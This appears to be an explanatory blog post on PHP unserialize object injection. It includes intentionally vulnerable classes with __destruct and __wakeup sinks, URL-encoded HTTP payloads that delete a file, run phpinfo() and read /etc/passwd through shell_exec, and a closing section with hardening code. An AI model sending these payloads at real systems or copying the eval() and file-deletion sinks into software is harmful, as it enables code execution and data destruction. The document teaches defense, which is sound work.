
Unserialize PHP Exploit Samples



A PHP unserialize exploit is a form of PHP object injection. It becomes possible when user-controlled input is passed to the unserialize() function without validation: unserialize() will instantiate any class named in the input and fill its properties, private ones included, with attacker-chosen values.

For the exploit to do anything useful, the application must have a class whose magic methods, such as __wakeup (called during unserialize()) or __destruct (called when the object is freed), do something dangerous with property values. unserialize() never calls the constructor, so checks placed in the constructor do not help.

See examples below:

For example, say you have this class named Sample1 with a __destruct method in it.

class Sample1 {
    private $file;

    public function __construct() {
        // SOME PHP CODES HERE
        // (never called by unserialize(), so nothing here protects $file)
    }

    public function __destruct() {
        // $this->file is attacker-controlled once the object came from unserialize()
        $file = '/tmp/'.$this->file;
        if(file_exists($file)) {
            return unlink($file);
        }
    }
}

// SOME PHP CODE HERE
unserialize($_GET['data']);

As you can see in the example above, the code unserializes $_GET['data'], a user-supplied value, without any validation. Because __destruct concatenates $this->file onto /tmp/, the attacker chooses which file gets unlinked, and with ../ sequences can reach files outside /tmp (a path traversal).

All we need to do is put a serialized Sample1 object in the data parameter. See the payload below (URL-encoded; %00 is the NUL byte PHP uses to mark private property names).


GET /Sample1.php?data=O%3A7%3A%22Sample1%22%3A1%3A%7Bs%3A13%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This payload sets Sample1's private $file to test.txt. When unserialize() returns and the object is discarded, __destruct runs and deletes /tmp/test.txt. Note the property name: a private property is serialized as \0Sample1\0file (NUL, class name, NUL, property name), and the declared string length, 13, counts both NUL bytes. Get the class-name or property-name length wrong and unserialize() returns false without creating the object.

Now check our second example, with the __wakeup magic method.

class Sample2 {
    private $cmd;

    public function __construct() {
        // SOME PHP CODE
    }

    public function __wakeup() {
        // runs during unserialize() itself, before the caller ever sees the object
        if($this->cmd) {
            eval($this->cmd);
        }
    }
}

// SOME PHP CODE
unserialize($_GET['data']);

In this example, an attacker can execute arbitrary PHP code by sending a malicious payload, because __wakeup passes the attacker-controlled $cmd straight to eval(). Check the payload below.


GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload simply executes phpinfo();. With a small change to the string, we can run any PHP code the web server's user is permitted to run. The payload below displays the contents of /etc/passwd (here the double quotes are left unencoded and spaces are encoded as +, both of which the query-string parser accepts).

GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

Basically, with this flaw the attacker gets full control of the victim's application: whatever the web server's user can do, the attacker can do. That's how serious this vulnerability is.

This vulnerability affects every PHP release since 5.0, where __wakeup and __destruct were introduced, and PHP 7 and 8 are no less affected. PHP 7.0 added the allowed_classes option to unserialize(): passing ['allowed_classes' => false] stops unserialize() from instantiating application classes at all, and never calling unserialize() on user input (use json_decode() instead) removes the bug entirely.
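To show what the fix looks like in code, the script below is an added example (not from the original post): it keeps the Sample2 class and its eval() sink exactly as above, but fronts it with two receivers that a hardened application would use instead of a bare unserialize($_GET['data']). The first disables object instantiation with allowed_classes; the second signs serialized state with an HMAC so a client cannot substitute its own bytes. The hostile payload swaps phpinfo() for a harmless marker assignment so the demo can tell whether eval() ran; the HMAC key, token format and session array are constructed for the demo. Requires PHP 7.0 or later.

```php
<?php
// Added example, not code from the original post. Demonstrates two ways to
// stop the Sample2 gadget from firing; the key, token format and session
// contents are constructed for the demo.

class Sample2 {
    private $cmd;

    public function __wakeup() {
        if ($this->cmd) {
            eval($this->cmd);
        }
    }
}

// The Sample2 payload from the post, with a harmless marker assignment in
// place of phpinfo(); so the demo can observe whether eval() ran.
function hostile_payload(): string {
    $code = '$GLOBALS["hit"] = true;';
    $key  = "\0Sample2\0cmd";            // mangled private property name
    return sprintf('O:7:"Sample2":1:{s:%d:"%s";s:%d:"%s";}',
        strlen($key), $key, strlen($code), $code);
}

// Fix 1: refuse to instantiate any class (PHP >= 7.0). Objects in the input
// come back as __PHP_Incomplete_Class, which has no __wakeup or __destruct,
// so the gadget's code is never reached.
function unserialize_untrusted(string $data) {
    return unserialize($data, ['allowed_classes' => false]);
}

// Fix 2: when serialized state must round-trip through the client, sign it
// server-side and verify before unserialize(), and still whitelist the
// classes you expect (an empty list here: only scalars and arrays).
function sign(string $blob, string $key): string {
    return hash_hmac('sha256', $blob, $key) . '.' . base64_encode($blob);
}

function open_signed(string $token, string $key, array $allowed) {
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($mac, $b64) = $parts;
    $blob = base64_decode($b64, true);
    if ($blob === false || !hash_equals(hash_hmac('sha256', $blob, $key), $mac)) {
        return null;   // forged or tampered: unserialize() is never reached
    }
    return unserialize($blob, ['allowed_classes' => $allowed]);
}

// ---- demo ---------------------------------------------------------------

// Unprotected: the bug from the post. __wakeup runs inside unserialize().
$GLOBALS['hit'] = false;
unserialize(hostile_payload());
printf("plain unserialize:       eval ran = %s\n", var_export($GLOBALS['hit'], true));

// Fix 1: same bytes, but the object is an incomplete class and nothing runs.
$GLOBALS['hit'] = false;
$obj = unserialize_untrusted(hostile_payload());
printf("allowed_classes=false:   class=%s, eval ran = %s\n",
    get_class($obj), var_export($GLOBALS['hit'], true));

// Fix 2: a legitimately signed array round-trips; a forged token is rejected
// before its contents are ever parsed.
$key = random_bytes(32);                      // constructed server-side secret
$session = sign(serialize(['user' => 'alice', 'role' => 'viewer']), $key);
var_dump(open_signed($session, $key, []));

$GLOBALS['hit'] = false;
$forged = hash_hmac('sha256', 'x', 'wrong-key') . '.' . base64_encode(hostile_payload());
var_dump(open_signed($forged, $key, []));
printf("forged signed token:     eval ran = %s\n", var_export($GLOBALS['hit'], true));
```

Of the two, prefer not to expose serialized PHP to the client at all (json_encode/json_decode carry plain data without instantiating classes); the HMAC receiver is for the case where an existing design already round-trips serialize() output through cookies or hidden fields. Note that allowed_classes alone only blocks magic methods on application classes; it does not validate the data, so the values still need the same checks any other user input gets.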

